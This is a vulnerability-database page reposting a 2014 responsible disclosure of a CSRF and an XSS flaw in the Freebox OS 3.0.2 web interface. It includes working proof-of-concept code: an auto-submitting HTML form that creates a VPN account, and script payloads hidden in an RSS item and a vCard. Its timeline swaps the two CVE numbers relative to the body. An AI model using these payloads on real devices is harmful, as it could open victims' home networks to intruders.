Vulners
Lucene search
FreeBox 3.0.2 Cross Site Request Forgery / Cross Site Scripting
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Freebox OS Web interface cross-site scripting vulnerability | 8 Jan 201600:00 | – | cnvd |
| Freebox OS Web interface cross-site request forgery vulnerability | 8 Jan 201600:00 | – | cnvd |
 | CVE-2014-9382 | 13 Jan 202013:42 | – | cve |
| CVE-2014-9405 | 6 Jan 202021:16 | – | cve |
 | CVE-2014-9382 | 13 Jan 202013:42 | – | cvelist |
| CVE-2014-9405 | 6 Jan 202021:16 | – | cvelist |
 | EUVD-2014-9204 | 7 Oct 202500:30 | – | euvd |
| EUVD-2014-9226 | 7 Oct 202500:30 | – | euvd |
 | CVE-2014-9382 | 13 Jan 202014:15 | – | nvd |
| CVE-2014-9405 | 6 Jan 202022:15 | – | nvd |
10
`Hello list,
Here are two CVEs I reported to Freebox, a french ISP:
- CVE-2014-9382 - CSRF in VPN user account creation
- CVE-2014-9405 - XSS
Vulnerable product: Freebox OS Web interface 3.0.2.
CVE-2014-9382 - CSRF in Freebox OS Web interface 3.0.2 allowing VPN user account creation
====================
Risk level: High
Freebox allows users to create VPN connections to their home network.
In version 3.0.2 when a new user is created, the following JSON request is sent to http://mafreebox.free.fr/api/v3/vpn/user/:
{"login":"foo","password_set":false,"ip_reservation":"","password":"bar"}
This request is vulnerable to CSRF which is easy to trigger.
The following POC would create a new VPN account "ngocdh" / "1234=5678":
<html>
<body onload=vpn.submit()>
<form name="vpn" action="http://mafreebox.free.fr/api/v3/vpn/user/" method="POST" enctype="text/plain">
<input type="hidden" name="{"login":"ngocdh","password_set":false,"ip_reservation":"","password":"1234" value="5678"}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CVE-2014-9405 - XSS in Freebox OS Web interface 3.0.2
====================
Risk level: low
Two XSS instances with low probability of exploitation were found in the following places:
- Download RSS
- Contacts
The following POC demonstrates the XSS in the "description" field of a Download RSS item:
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>From Huy Ngoc</title>
<description>[email protected]</description>
<link>http://google.com</link>
<atom:link rel="hub" href="http://google.com"/>
<atom:link rel="self" href="http://google.com"/>
<item>
<title>Test by huyngoc</title><description><![CDATA[<img src=/ onerror="alert(document.domain)">]]></description>
<pubDate>Wed, 19 <b>Nov 2014</b> 20:36:47 UTC</pubDate>
<guid>http://google.com></guid>
</item>
</channel>
</rss>
In order to exploit this XSS, the attacker must control a RSS feed to which a user have subscribed.
The following VCF file demonstrates a XSS exploitation POC, "alert(document.domain)" would be called after importing this VCF file from the web interface:
BEGIN:VCARD
VERSION:3.0
FN:DAU Huy Ngoc
N:;;;;
URL:<img src=/ onerror='alert(document.domain);'>
END:VCARD
In order to exploit this XSS, the attacker must trick a user into importing his malicious .vcf.
Timeline:
21/11/2014: XSS CVE-2014-9382 is reported to vendor
21/11/2014: vendor confirmed the vulnerability
02/12/2014: CSRF CVE-2014-9405 is reported to vendor
06/12/2014: a hot fix is released (http://dev.freebox.fr/blog/?p=1867)
Credit: DAU Huy Ngoc (@ngocdh)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jun 2015 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.00579